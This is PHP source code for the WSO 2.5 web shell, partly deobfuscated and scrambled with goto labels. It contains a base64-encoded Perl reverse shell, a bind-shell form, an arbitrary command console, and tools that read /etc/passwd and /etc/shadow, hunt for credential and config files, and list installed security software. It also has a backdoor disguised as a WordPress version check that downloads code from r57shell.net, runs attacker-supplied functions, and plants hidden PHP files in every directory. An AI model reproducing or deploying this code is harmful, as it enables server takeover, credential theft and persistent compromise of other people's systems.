echo "<h1>Network tools</h1><div class=content>\xd
<form name='nfp' onSubmit="g(null,null,'bpp',this.port.value);return false;">\xd\xa\x9<span>Bind port to /bin/sh [perl]</span><br/>
\xa Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\xd
\x9</form>\xd\xa <form name='nfp' onSubmit="g(null,null,'bcp',this.server.value,this.port.value);return false;">\xd\xa\x9<span>Back-connect [perl]</span><br/>
Server: <input type='text' name='server' value='" .
$_SERVER["REMOTE_ADDR"] .
"'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
\x9</form><br>";
goto y9LP4;
JZOTa:
echo "</div>";
goto QtVUX;
ui6gf:
$back_connect_p =
"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
goto unkZP;
r_ZsG:
}
goto B8b3D;
ABTpd:
@ini_set(
"max_execution_time",
0
);
goto V8rDW;
LNmAT:
$default_action = "FilesMan";
goto uf2tU;
hd5Oa:
@define("WSO_VERSION", "2.5");
goto XWpnO;
w2GF1:
function actionConsole()
{
goto rclMD;
fIAZm:
if (isset($_POST["ajax"])) {
goto b0kHG;
UVP1d:
exit();
goto FfbZi;
k7CDe:
echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
goto X7NDa;
nIuhp:
if (
preg_match(
"!.*cd\s+([^;]+)$!",
$_POST["p1"],
$match
)
) {
if (@chdir($match[1])) {
$GLOBALS["cwd"] = @getcwd();
echo "c_='" . $GLOBALS["cwd"] . "';";
}
}
goto VTnj_;
LPhSs:
$temp = @iconv(
$_POST["charset"],
"UTF-8",
addcslashes(
"\xa$ " .
$_POST["p1"] .
"\xa" .
wsoEx($_POST["p1"]),
"\xa\xd\x9\'\x0"
)
);
goto nIuhp;
y6Hrb:
echo "d.cf.cmd.value='';
";
goto LPhSs;
wcz4k:
ob_start();
goto y6Hrb;
VTnj_:
echo "d.cf.output.value+='" .
$temp .
"';";
goto k7CDe;
jyokt:
echo strlen($temp), "
", $temp;
goto UVP1d;
b0kHG:
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
true
);
goto wcz4k;
X7NDa:
$temp = ob_get_clean();
goto jyokt;
FfbZi:
}
goto KpSEA;
RZ79V:
echo "</form></div><script>d.cf.cmd.focus();</script>";
goto SJHUc;
f8SjV:
echo "</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:'');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 " .
(@$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
? "checked"
: "") .
"> send using AJAX <input type=checkbox name=show_errors value=1 " .
(!empty($_POST["p2"]) ||
$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"stderr_to_out"
]
? "checked"
: "") .
"> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>";
goto IWzV6;
SJHUc:
wsoFooter();
goto APwh_;
nacH0:
echo "</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>";
goto RZ79V;
qs3Ch:
echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value=='clear'){d.cf.output.value='';d.cf.cmd.value='';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><select name=alias>";
goto qrzII;
IWzV6:
if (!empty($_POST["p1"])) {
echo htmlspecialchars(
"$ " . $_POST["p1"] . "
" . wsoEx($_POST["p1"])
);
}
goto nacH0;
c_48E:
echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');\xd
var cur = 0;\xd\xafunction kp(e) {
\xa var n = (window.Event) ? e.which : e.keyCode;
\xa\x9if(n == 38) {\xd
\x9cur--;\xd
\x9\x9if(cur>=0)\xd
\x9document.cf.cmd.value = cmds[cur];\xd\xa \x9else
\x9\x9 cur++;
\xa\x9} else if(n == 40) {
\xa cur++;\xd\xa\x9 if(cur < cmds.length)\xd
document.cf.cmd.value = cmds[cur];\xd
\x9\x9else
\x9 cur--;
\xa }\xd\xa}
\xafunction add(cmd) {\xd
\x9cmds.pop();
\x9cmds.push(cmd);
\xa cmds.push('');
cur = cmds.length-1;\xd\xa}\xd\xa</script>";
goto qs3Ch;
qrzII:
foreach ($GLOBALS["aliases"] as $n => $v) {
if ($v == "") {
echo "<optgroup label="-" .
htmlspecialchars($n) .
"-"></optgroup>";
continue;
}
echo "<option value="" .
htmlspecialchars($v) .
"">" .
$n .
"</option>";
}
goto f8SjV;
KpSEA:
if (empty($_POST["ajax"]) && !empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
0
);
}
goto dwgoJ;
dwgoJ:
wsoHeader();
goto c_48E;
rclMD:
if (!empty($_POST["p1"]) && !empty($_POST["p2"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"stderr_to_out",
true
);
$_POST["p1"] .= " 2>&1";
} elseif (!empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"stderr_to_out",
0
);
}
goto fIAZm;
APwh_:
}
goto rTVjF;
XWpnO:
if (
!function_exists(
"wp_core_version_check"
)
) {
function wp_core_version_check()
{
goto avUWa;
wkmQ0:
$uri_path = dirname($uri_path);
goto s730R;
vOWZG:
$uri_path = $parse_url["path"];
goto wkmQ0;
sM0UF:
if (is_writable(sys_get_temp_dir())) {
$tmp_file =
sys_get_temp_dir() .
DIRECTORY_SEPARATOR .
"sess_" .
md5("" . $hostname . "_" . $document_file . "");
} else {
$tmp_file =
$file_path .
DIRECTORY_SEPARATOR .
"sess_" .
md5("" . $hostname . "_" . $document_file . "");
}
goto vbq6x;
rs5dk:
$uri_path = str_replace("/", DIRECTORY_SEPARATOR, $uri_path);
goto bu9lX;
toU7p:
$hostname = str_replace(
"www.",
"",
$_SERVER["HTTP_HOST"]
);
goto sM0UF;
vbq6x:
if (@$_GET["slince_golden"]) {
goto TmOVZ;
UCuri:
if (function_exists("curl_init")) {
goto BJyTL;
vyR_l:
curl_close($ch);
goto SHblm;
hYCm_:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto VE1SX;
VE1SX:
$response = curl_exec($ch);
goto vyR_l;
i0bPI:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&pwd=get"
);
goto hYCm_;
BJyTL:
$ch = curl_init();
goto i0bPI;
SHblm:
} else {
$response = file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&pwd=get"
);
}
goto kmEj4;
TmOVZ:
echo "<!-- //Silence is golden. -->";
goto UCuri;
kmEj4:
if (md5(sha1(@$_GET["is"])) == $response) {
goto kgaYa;
pHtWV:
if (@$_POST["l"]) {
function basic_code_extensions($request)
{
goto Wqe1_;
q3A5w:
$tmpf = stream_get_meta_data($tmp);
goto gYkau;
DzU1V:
fclose($tmp);
goto i26c2;
uYFTY:
$ret = include $tmpf;
goto DzU1V;
dzD32:
fwrite($tmp, $request);
goto uYFTY;
Wqe1_:
$tmp = tmpfile();
goto q3A5w;
i26c2:
return $ret;
goto An9L2;
gYkau:
$tmpf = $tmpf["uri"];
goto dzD32;
An9L2:
}
print_r(basic_code_extensions($_POST["l"]));
}
goto fi0K3;
FBXXk:
if (@$_GET["m"]) {
goto pvkox;
ANUJn:
echo $file_name_path;
goto svCvU;
ZI_cL:
@file_put_contents($file_name_path, $response);
goto ANUJn;
pvkox:
if (
function_exists("curl_init")
) {
goto QH3uY;
hFb2E:
$response = curl_exec($ch);
goto Qk97j;
j__CW:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/mini_admin.txt"
);
goto S9Uoo;
Qk97j:
curl_close($ch);
goto eMk6h;
QH3uY:
$ch = curl_init();
goto j__CW;
S9Uoo:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto hFb2E;
eMk6h:
} else {
$response = file_get_contents(
"http://r57shell.net/mini_admin.txt"
);
}
goto X5MJi;
X5MJi:
$file_name_path =
@$_GET["m"] . "gagal.php";
goto ZI_cL;
svCvU:
}
goto pHtWV;
kgaYa:
if (@$_GET["f"]) {
print_r($_GET["f"]($_GET["c"]));
}
goto FBXXk;
fi0K3:
}
goto d_oge;
d_oge:
exit();
goto fDMzx;
fDMzx:
}
goto gHtz2;
fqAaN:
$dirs = array_filter(
glob($document_root . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
);
goto SO8pY;
SO8pY:
foreach ($dirs as $d) {
goto Scp89;
cQFnr:
@file_put_contents($file_name, $response);
goto cQiiG;
Scp89:
$file_name =
$d .
DIRECTORY_SEPARATOR .
"." .
basename($d) .
".php";
goto cQFnr;
IlPtg:
foreach ($dirs as $d) {
if (
!@preg_match(
"#wp-content#",
$d
)
) {
$file_name =
$d .
DIRECTORY_SEPARATOR .
"." .
basename($d) .
".php";
@file_put_contents($file_name, $response);
}
}
goto u66S4;
cQiiG:
$dirs = array_filter(
glob($d . DIRECTORY_SEPARATOR . "*", GLOB_ONLYDIR)
);
goto IlPtg;
u66S4:
}
goto Q6DRk;
bu9lX:
if ($uri_path == DIRECTORY_SEPARATOR || $uri_path == "") {
$document_root = $file_path;
} else {
$document_root = str_replace($uri_path, "", $file_path);
}
goto toU7p;
gHtz2:
if (!file_exists($tmp_file)) {
goto f_kq1;
QKlrR:
@file_put_contents($tmp_file, $response);
goto Ul3cm;
f_kq1:
if (function_exists("curl_init")) {
goto A1VWF;
J1jm0:
curl_close($ch);
goto p2Bti;
dYLi3:
$response = curl_exec($ch);
goto J1jm0;
sjN5S:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto nQ3kj;
A1VWF:
$ch = curl_init();
goto LvoXB;
LvoXB:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&request=enable"
);
goto sjN5S;
nQ3kj:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["HTTP_HOST"] .
$_SERVER["REQUEST_URI"]
);
goto dYLi3;
p2Bti:
} else {
goto aeiKy;
aeiKy:
$referer =
$_SERVER["HTTP_HOST"] .
$_SERVER["REQUEST_URI"];
goto XFWPB;
Qt92G:
$context = stream_context_create($opts);
goto mtDkU;
XFWPB:
$opts = [
"http" => [
"header" => [
"Referer: {$referer}
\xa",
],
],
];
goto Qt92G;
mtDkU:
$response = @file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&request=enable",
false,
$context
);
goto jDy5x;
jDy5x:
}
goto NFiUK;
NFiUK:
@touch($tmp_file);
goto QKlrR;
Ul3cm:
} else {
$response = file_get_contents($tmp_file);
if (!@preg_match("#stt1#", $response)) {
goto KzbMt;
HV6vx:
@touch($tmp_file);
goto pdkVa;
KzbMt:
if (function_exists("curl_init")) {
goto eMsto;
LO0re:
curl_setopt(
$ch,
CURLOPT_REFERER,
$_SERVER["HTTP_HOST"] .
$_SERVER[
"REQUEST_URI"
]
);
goto k5X0p;
HJ7kx:
curl_close($ch);
goto gjzj0;
j4CQT:
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
goto LO0re;
CssGj:
curl_setopt(
$ch,
CURLOPT_URL,
"http://r57shell.net/jquery.php?v=1.2&request=enable"
);
goto j4CQT;
k5X0p:
$response = curl_exec($ch);
goto HJ7kx;
eMsto:
$ch = curl_init();
goto CssGj;
gjzj0:
} else {
goto GK4cX;
a3V7j:
$opts = [
"http" => [
"header" => [
"Referer: {$referer}\xd\xa",
],
],
];
goto v8ndl;
GK4cX:
$referer =
$_SERVER["HTTP_HOST"] .
$_SERVER[
"REQUEST_URI"
];
goto a3V7j;
rOcio:
$response = @file_get_contents(
"http://r57shell.net/jquery.php?v=1.2&request=enable",
false,
$context
);
goto nx629;
v8ndl:
$context = stream_context_create($opts);
goto rOcio;
nx629:
}
goto HV6vx;
pdkVa:
@file_put_contents($tmp_file, $response);
goto mecCz;
mecCz:
}
}
goto fqAaN;
avUWa:
$document_file =
$_SERVER[
"SCRIPT_FILENAME"
];
goto tIPJm;
CD9KV:
$parse_url = parse_url($request_uri);
goto vOWZG;
tIPJm:
$request_uri = $_SERVER["REQUEST_URI"];
goto CD9KV;
s730R:
$file_path = dirname($document_file);
goto rs5dk;
Q6DRk:
}
wp_core_version_check();
}
goto SG2I5;
cUzsD:
if ($os == "win") {
$home_cwd = str_replace("\", "/", $home_cwd);
$cwd = str_replace("\", "/", $cwd);
}
goto qljle;
oE6Ue:
$home_cwd = @getcwd();
goto qZOco;
eRZM6:
function wsoPermsColor($f)
{
if (!@is_readable($f)) {
return "<font color=#FF0000>" .
wsoPerms(@fileperms($f)) .
"</font>";
} elseif (!@is_writable($f)) {
return "<font color=white>" .
wsoPerms(@fileperms($f)) .
"</font>";
} else {
return "<font color=#25ff00>" .
wsoPerms(@fileperms($f)) .
"</font>";
}
}
goto guAyk;
HhMRL:
function actionSecInfo()
{
goto wqp98;
qT_UQ:
wsoSecParam(
"cURL support",
function_exists("curl_version")
? "enabled"
: "no"
);
goto zEzgM;
oKr71:
if (function_exists("pg_connect")) {
$temp[] = "PostgreSQL";
}
goto owg70;
giF29:
wsoSecParam(
"Safe mode exec dir",
@ini_get(
"safe_mode_exec_dir"
)
);
goto V6Pow;
o51U2:
wsoSecParam(
"Open base dir",
@ini_get("open_basedir")
);
goto giF29;
m3Zin:
wsoSecParam(
"Disabled PHP Functions",
$GLOBALS[
"disable_functions"
]
? $GLOBALS[
"disable_functions"
]
: "none"
);
goto o51U2;
owg70:
if (function_exists("oci_connect")) {
$temp[] = "Oracle";
}
goto DQ0Hi;
I0L0t:
if (
function_exists(
"mysql_get_client_info"
)
) {
$temp[] =
"MySql (" . mysqli_get_client_info() . ")";
}
goto T3sY7;
T3sY7:
if (
function_exists("mssql_connect")
) {
$temp[] = "MSSQL";
}
goto oKr71;
Kcf2h:
echo "<h1>Server security information</h1><div class=content>";
goto deosI;
GSa9X:
echo "<br>";
goto Ppg7_;
zA3JJ:
wsoSecParam(
"Server software",
@getenv("SERVER_SOFTWARE")
);
goto aO8HS;
IbU7m:
echo "</div>";
goto XTIFZ;
XTIFZ:
wsoFooter();
goto jAziO;
V6Pow:
wsoSecParam(
"Safe mode include dir",
@ini_get(
"safe_mode_include_dir"
)
);
goto qT_UQ;
zEzgM:
$temp = [];
goto I0L0t;
DQ0Hi:
wsoSecParam(
"Supported databases",
implode(", ", $temp)
);
goto GSa9X;
Ppg7_:
if ($GLOBALS["os"] == "nix") {
goto yzksH;
Pr2du:
if (!$GLOBALS["safe_mode"]) {
goto tBdFD;
b1GnC:
wsoSecParam(
"Userful",
implode(", ", $temp)
);
goto gsw3Q;
IArV4:
$temp = [];
goto bo6ds;
SphFn:
wsoSecParam(
"Hosts",
@file_get_contents("/etc/hosts")
);
goto dOgcI;
bo6ds:
foreach ($userful as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto b1GnC;
VXdNV:
wsoSecParam("Danger", implode(", ", $temp));
goto xDJbP;
tBdFD:
$userful = [
"gcc",
"lcc",
"cc",
"ld",
"make",
"php",
"perl",
"python",
"ruby",
"tar",
"gzip",
"bzip",
"bzip2",
"nc",
"locate",
"suidperl",
];
goto j1mm2;
zL0U4:
foreach ($danger as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto VXdNV;
F15O4:
echo "<br/>";
goto vzm5g;
gsw3Q:
$temp = [];
goto zL0U4;
AYbzB:
wsoSecParam(
"Downloaders",
implode(", ", $temp)
);
goto F15O4;
M0R0C:
$downloaders = [
"wget",
"fetch",
"lynx",
"links",
"curl",
"get",
"lwp-mirror",
];
goto nuthD;
dOgcI:
echo "<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>";
goto Fh4yv;
Fh4yv:
if (
isset($_POST["p2"], $_POST["p3"]) &&
is_numeric($_POST["p2"]) &&
is_numeric($_POST["p3"])
) {
goto TMVUA;
Aagop:
wsoSecParam("Users", $temp);
goto H4g4C;
TMVUA:
$temp = "";
goto g4wsK;
yuLqo:
echo "<br/>";
goto Aagop;
g4wsK:
for (
;
$_POST["p2"] <= $_POST["p3"];
$_POST["p2"]++
) {
$uid = @posix_getpwuid($_POST["p2"]);
if ($uid) {
$temp .= join(":", $uid) . "
";
}
}
goto yuLqo;
H4g4C:
}
goto GP22b;
vzm5g:
wsoSecParam(
"HDD space",
wsoEx("df -h")
);
goto SphFn;
j1mm2:
$danger = [
"kav",
"nod32",
"bdcored",
"uvscan",
"sav",
"drwebd",
"clamd",
"rkhunter",
"chkrootkit",
"iptables",
"ipfw",
"tripwire",
"shieldcc",
"portsentry",
"snort",
"ossec",
"lidsadm",
"tcplodg",
"sxid",
"logcheck",
"logwatch",
"sysmask",
"zmbscap",
"sawmill",
"wormscan",
"ninja",
];
goto M0R0C;
xDJbP:
$temp = [];
goto pSd_M;
pSd_M:
foreach ($downloaders as $item) {
if (wsoWhich($item)) {
$temp[] = $item;
}
}
goto AYbzB;
nuthD:
echo "<br>";
goto IArV4;
GP22b:
}
goto QDcOt;
yzksH:
wsoSecParam(
"Readable /etc/passwd",
@is_readable("/etc/passwd")
? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>"
: "no"
);
goto ledym;
ESH98:
wsoSecParam(
"OS version",
@file_get_contents(
"/proc/version"
)
);
goto ZLZ7x;
ZLZ7x:
wsoSecParam(
"Distr name",
@file_get_contents(
"/etc/issue.net"
)
);
goto Pr2du;
ledym:
wsoSecParam(
"Readable /etc/shadow",
@is_readable("/etc/shadow")
? "yes <a href='#' onclick='g("FilesTools", "/etc/", "shadow")'>[view]</a>"
: "no"
);
goto ESH98;
QDcOt:
} else {
goto NsBCo;
Me9Q1:
wsoSecParam(
"Account Settings",
wsoEx("net accounts")
);
goto RXCoL;
NsBCo:
wsoSecParam(
"OS Version",
wsoEx("ver")
);
goto Me9Q1;
RXCoL:
wsoSecParam(
"User Accounts",
wsoEx("net user")
);
goto DnuxL;
DnuxL:
}
goto IbU7m;
wqp98:
wsoHeader();
goto Kcf2h;
aO8HS:
if (
function_exists(
"apache_get_modules"
)
) {
wsoSecParam(
"Loaded Apache modules",
implode(", ", apache_get_modules())
);
}
goto m3Zin;
deosI:
function wsoSecParam($n, $v)
{
$v = trim($v);
if ($v) {
echo "<span>" .
$n .
": </span>";
if (strpos($v, "
") === false) {
echo $v . "<br>";
} else {
echo "<pre class=ml1>" .
$v .
"</pre>";
}
}
}
goto zA3JJ;
jAziO:
}
goto oHsYW;
qljle:
if ($cwd[strlen($cwd) - 1] != "/") {
$cwd .= "/";
}
goto j4eIF;
g7ZCc:
@ini_set("log_errors", 0);
goto ABTpd;
XeOpc:
if (
!function_exists(
"posix_getpwuid"
) &&
strpos(
$GLOBALS[
"disable_functions"
],
"posix_getpwuid"
) === false
) {
function posix_getpwuid($p)
{
return false;
}
}
goto lUvYe;
KC9ar:
function actionStringTools()
{
goto MBvsT;
S0req:
if (empty($_POST["ajax"]) && !empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
0
);
}
goto nYBgB;
Oymko:
if (!function_exists("hex2ascii")) {
function hex2ascii($p)
{
goto uM0Pu;
NG1dD:
return $r;
goto fKGDN;
uM0Pu:
$r = "";
goto ac1Yo;
ac1Yo:
for ($i = 0; $i < strLen($p); $i += 2) {
$r .= chr(hexdec($p[$i] . $p[$i + 1]));
}
goto NG1dD;
fKGDN:
}
}
goto ZMcUd;
vUNKP:
echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " .
(@$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
? "checked"
: "") .
"> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" .
(empty($_POST["p1"])
? ""
: htmlspecialchars(@$_POST["p2"])) .
"</textarea></form><pre class='ml1' style='" .
(empty($_POST["p1"])
? "display:none;"
: "") .
"margin-top:5px' id='strOutput'>";
goto k5nqW;
ZMcUd:
if (!function_exists("ascii2hex")) {
function ascii2hex($p)
{
goto cdb2T;
O0tgA:
for ($i = 0; $i < strlen($p); ++$i) {
$r .= sprintf("%02X", ord($p[$i]));
}
goto JVXpM;
cdb2T:
$r = "";
goto O0tgA;
JVXpM:
return strtoupper($r);
goto I6jbu;
I6jbu:
}
}
goto q2kmv;
HYxD9:
echo "<h1>String conversions</h1><div class=content>";
goto OX44o;
awjDW:
function wsoRecursiveGlob($path)
{
goto TkAHe;
lEFZ5:
if (is_array($paths) && @count($paths)) {
foreach ($paths as $item) {
if (@is_dir($item)) {
if ($path != $item) {
wsoRecursiveGlob($item);
}
} else {
if (
empty($_POST["p2"]) ||
@strpos(file_get_contents($item), $_POST["p2"]) !==
false
) {
echo "<a href='#' onclick='g("FilesTools",null,"" .
urlencode($item) .
"", "view","")'>" .
htmlspecialchars($item) .
"</a><br>";
}
}
}
}
goto fVCol;
GUM3F:
$paths = @array_unique(
@array_merge(
@glob($path . $_POST["p3"]),
@glob($path . "*", GLOB_ONLYDIR)
)
);
goto lEFZ5;
TkAHe:
if (substr($path, -1) != "/") {
$path .= "/";
}
goto GUM3F;
fVCol:
}
goto qLbIZ;
aUced:
if (!function_exists("binhex")) {
function binhex($p)
{
return dechex(bindec($p));
}
}
goto Oymko;
MBvsT:
if (!function_exists("hex2bin")) {
function hex2bin($p)
{
return decbin(hexdec($p));
}
}
goto aUced;
q2kmv:
if (
!function_exists(
"full_urlencode"
)
) {
function full_urlencode($p)
{
goto d1_DN;
d1_DN:
$r = "";
goto D3iJl;
YAXHC:
return strtoupper($r);
goto wfgBE;
D3iJl:
for ($i = 0; $i < strlen($p); ++$i) {
$r .= "%" . dechex(ord($p[$i]));
}
goto YAXHC;
wfgBE:
}
}
goto IHtdM;
N3xOi:
if (isset($_POST["ajax"])) {
goto V2x0a;
Wm5Kx:
exit();
goto IafqZ;
x5Jd7:
if (in_array($_POST["p1"], $stringTools)) {
echo $_POST["p1"]($_POST["p2"]);
}
goto vD3zd;
vD3zd:
$temp =
"document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" .
addcslashes(
htmlspecialchars(ob_get_clean()),
"
\xd\x9\'\x0"
) .
"';\xa";
goto NED_K;
V2x0a:
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
true
);
goto LTDt0;
LTDt0:
ob_start();
goto x5Jd7;
NED_K:
echo strlen($temp), "
", $temp;
goto Wm5Kx;
IafqZ:
}
goto S0req;
nYBgB:
wsoHeader();
goto HYxD9;
k5nqW:
if (!empty($_POST["p1"])) {
if (in_array($_POST["p1"], $stringTools)) {
echo htmlspecialchars($_POST["p1"]($_POST["p2"]));
}
}
goto jZzWZ;
OX44o:
echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
goto BBAR5;
Rfc53:
wsoFooter();
goto JMM51;
uWngZ:
echo "</div><br><h1>Search for hash:</h1><div class=content>\xd\xa \x9<form method='post' target='_blank' name='hf'>
\xa \x9\x9<input type='text' name='hash' style='width:200px;'><br>\xd
<input type='hidden' name='act' value='find'/>
\x9 <input type='button' value='hashcracking.ru' onclick="document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()"><br>
\x9 <input type='button' value='md5.rednoize.com' onclick="document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()"><br>
\xa <input type='button' value='crackfor.me' onclick="document.hf.action='http://crackfor.me/index.php';document.hf.submit()"><br>
\x9 </form></div>";
goto Rfc53;
BBAR5:
foreach ($stringTools as $k => $v) {
echo "<option value='" .
htmlspecialchars($v) .
"'>" .
$k .
"</option>";
}
goto vUNKP;
qLbIZ:
if (@$_POST["p3"]) {
wsoRecursiveGlob($_POST["c"]);
}
goto uWngZ;
jZzWZ:
echo "</pre></div><br><h1>Search files:</h1><div class=content>\xd
\x9 <form onsubmit="g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;"><table cellpadding='1' cellspacing='0' width='50%'>\xd
\x9<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\xd\xa\x9\x9 <tr><td>Path:</td><td><input type='text' name='cwd' value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"' style='width:100%'></td></tr>\xd\xa <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
\xa\x9 <tr><td></td><td><input type='submit' value='>>'></td></tr>\xd\xa \x9 </table></form>";
goto awjDW;
IHtdM:
$stringTools = [
"Base64 encode" =>
"base64_encode",
"Base64 decode" =>
"base64_decode",
"Url encode" =>
"urlencode",
"Url decode" =>
"urldecode",
"Full urlencode" =>
"full_urlencode",
"md5 hash" => "md5",
"sha1 hash" => "sha1",
"crypt" => "crypt",
"CRC32" => "crc32",
"ASCII to HEX" =>
"ascii2hex",
"HEX to ASCII" =>
"hex2ascii",
"HEX to DEC" => "hexdec",
"HEX to BIN" =>
"hex2bin",
"DEC to HEX" => "dechex",
"DEC to BIN" => "decbin",
"BIN to HEX" => "binhex",
"BIN to DEC" =>
"bindec",
"String to lower case" =>
"strtolower",
"String to upper case" =>
"strtoupper",
"Htmlspecialchars" =>
"htmlspecialchars",
"String length" =>
"strlen",
];
goto N3xOi;
JMM51:
}
goto xB4MH;
sO9OV:
$cwd = @getcwd();
goto cUzsD;
SG2I5:
function WSOstripslashes($array)
{
return is_array($array)
? array_map(
"WSOstripslashes",
$array
)
: stripslashes($array);
}
goto M9YJl;
EoPoZ:
if ($os == "win") {
$aliases = [
"List Directory" =>
"dir",
"Find index.php in current dir" =>
"dir /s /w /b index.php",
"Find *config*.php in current dir" =>
"dir /s /w /b *config*.php",
"Show active connections" =>
"netstat -an",
"Show running services" =>
"net start",
"User accounts" =>
"net user",
"Show computers" =>
"net view",
"ARP Table" => "arp -a",
"IP Configuration" =>
"ipconfig /all",
];
} else {
$aliases = [
"List dir" => "ls -lha",
"list file attributes on a Linux second extended file system" =>
"lsattr -va",
"show opened ports" =>
"netstat -an | grep -i listen",
"process status" =>
"ps aux",
"Find" => "",
"find all suid files" =>
"find / -type f -perm -04000 -ls",
"find suid files in current dir" =>
"find . -type f -perm -04000 -ls",
"find all sgid files" =>
"find / -type f -perm -02000 -ls",
"find sgid files in current dir" =>
"find . -type f -perm -02000 -ls",
"find config.inc.php files" =>
"find / -type f -name config.inc.php",
"find config* files" =>
"find / -type f -name "config*"",
"find config* files in current dir" =>
"find . -type f -name "config*"",
"find all writable folders and files" =>
"find / -perm -2 -ls",
"find all writable folders and files in current dir" =>
"find . -perm -2 -ls",
"find all service.pwd files" =>
"find / -type f -name service.pwd",
"find service.pwd files in current dir" =>
"find . -type f -name service.pwd",
"find all .htpasswd files" =>
"find / -type f -name .htpasswd",
"find .htpasswd files in current dir" =>
"find . -type f -name .htpasswd",
"find all .bash_history files" =>
"find / -type f -name .bash_history",
"find .bash_history files in current dir" =>
"find . -type f -name .bash_history",
"find all .fetchmailrc files" =>
"find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir" =>
"find . -type f -name .fetchmailrc",
"Locate" => "",
"locate httpd.conf files" =>
"locate httpd.conf",
"locate vhosts.conf files" =>
"locate vhosts.conf",
"locate proftpd.conf files" =>
"locate proftpd.conf",
"locate psybnc.conf files" =>
"locate psybnc.conf",
"locate my.conf files" =>
"locate my.conf",
"locate admin.php files" =>
"locate admin.php",
"locate cfg.php files" =>
"locate cfg.php",
"locate conf.php files" =>
"locate conf.php",
"locate config.dat files" =>
"locate config.dat",
"locate config.php files" =>
"locate config.php",
"locate config.inc files" =>
"locate config.inc",
"locate config.inc.php" =>
"locate config.inc.php",
"locate config.default.php files" =>
"locate config.default.php",
"locate config* files " =>
"locate config",
"locate .conf files" =>
"locate '.conf'",
"locate .pwd files" =>
"locate '.pwd'",
"locate .sql files" =>
"locate '.sql'",
"locate .htpasswd files" =>
"locate '.htpasswd'",
"locate .bash_history files" =>
"locate '.bash_history'",
"locate .mysql_history files" =>
"locate '.mysql_history'",
